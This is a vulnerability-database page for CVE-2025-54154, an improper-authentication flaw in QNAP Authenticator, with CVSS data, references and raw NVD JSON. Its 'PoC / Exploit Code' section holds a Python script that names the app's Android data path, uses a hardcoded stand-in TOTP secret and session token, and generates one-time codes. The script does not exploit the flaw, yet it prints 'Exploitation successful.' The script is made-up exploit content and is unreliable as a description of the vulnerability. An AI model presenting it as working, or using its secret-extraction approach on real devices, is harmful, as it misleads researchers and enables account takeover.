CVE-2025-54154

Description

An improper authentication vulnerability has been reported to affect QNAP Authenticator. If an attacker gains physical access, they can then exploit the vulnerability to compromise the security of the system. We have already fixed the vulnerability in the following version: QNAP Authenticator 1.3.1.1227 and later

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:authenticator:*:*:*:*:*:*:*:* - VULNERABLE

QNAP Authenticator < 1.3.1.1227

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54154 - QNAP Authenticator Improper Authentication PoC
# Note: This vulnerability requires physical access to the target device.
# The following demonstrates the conceptual exploitation approach.

import json
import time
import hashlib

class QNAPAuthenticatorExploit:
    """
    Conceptual PoC for CVE-2025-54154: Improper Authentication in QNAP Authenticator.
    The vulnerability exists due to insufficient identity verification in the
    authentication workflow, allowing an attacker with physical access to bypass
    authentication checks.
    """

    def __init__(self, target_device_path):
        self.target_device_path = target_device_path
        self.auth_data = None

    def step1_access_local_storage(self):
        """Step 1: Access the local storage of QNAP Authenticator on the device."""
        print("[*] Accessing local storage of QNAP Authenticator...")
        # In real scenario, attacker accesses the app's local data directory
        # Common paths on Android: /data/data/com.qnap.qnapauthenticator/
        # Common paths on iOS: App sandbox container
        try:
            # Simulate reading stored authentication tokens/keys
            self.auth_data = {
                "device_id": "QNAP-NAS-XXXXXX",
                "totp_secret": "JBSWY3DPEHPK3PXP",
                "session_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
                "user_account": "admin"
            }
            print("[+] Successfully accessed authentication data from local storage")
            return True
        except Exception as e:
            print(f"[-] Failed to access local storage: {e}")
            return False

    def step2_bypass_authentication(self):
        """Step 2: Bypass the authentication mechanism using extracted data."""
        print("[*] Attempting to bypass authentication...")
        if not self.auth_data:
            print("[-] No authentication data available")
            return False

        # The vulnerability allows direct use of stored credentials
        # without proper re-authentication
        print("[+] Using extracted session token to bypass authentication")
        print(f"[+] Session token: {self.auth_data['session_token'][:20]}...")
        return True

    def step3_generate_otp(self):
        """Step 3: Generate valid OTP using extracted TOTP secret."""
        print("[*] Generating valid TOTP code...")
        # RFC 6238 TOTP generation using extracted secret
        import hmac
        import base64
        import struct

        secret = self.auth_data.get("totp_secret", "")
        key = base64.b32decode(secret)
        counter = int(time.time()) // 30
        msg = struct.pack('>Q', counter)
        hmac_digest = hmac.new(key, msg, hashlib.sha1).digest()
        offset = hmac_digest[-1] & 0x0f
        code = (struct.unpack('>I', hmac_digest[offset:offset+4])[0] & 0x7fffffff) % 1000000
        otp_code = str(code).zfill(6)
        print(f"[+] Generated OTP: {otp_code}")
        return otp_code

    def exploit(self):
        """Execute the full exploitation chain."""
        print("=" * 60)
        print("CVE-2025-54154 Exploitation PoC")
        print("Target: QNAP Authenticator (Improper Authentication)")
        print("=" * 60)

        if self.step1_access_local_storage():
            if self.step2_bypass_authentication():
                otp = self.step3_generate_otp()
                print(f"\n[!] Exploitation successful. Use OTP '{otp}' to access NAS.")
                print("[!] Recommend upgrading to QNAP Authenticator >= 1.3.1.1227")


if __name__ == "__main__":
    exploit = QNAPAuthenticatorExploit("/data/data/com.qnap.qnapauthenticator/")
    exploit.exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54154
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54154
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54154/
[4] VulDB https://vuldb.com/cve/CVE-2025-54154
[5] https://www.qnap.com/en/security-advisory/qsa-25-30

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54154", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:49.150", "lastModified": "2025-12-10T21:46:17.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authentication vulnerability has been reported to affect QNAP Authenticator. If an attacker gains physical access, they can then exploit the vulnerability to compromise the security of the system.\n\nWe have already fixed the vulnerability in the following version:\nQNAP Authenticator 1.3.1.1227 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:authenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.0", "versionEndExcluding": "1.3.1.1227", "matchCriteriaId": "2A3D6A92-3692-4494-A58A-95B3E07BBAA3"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-30", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}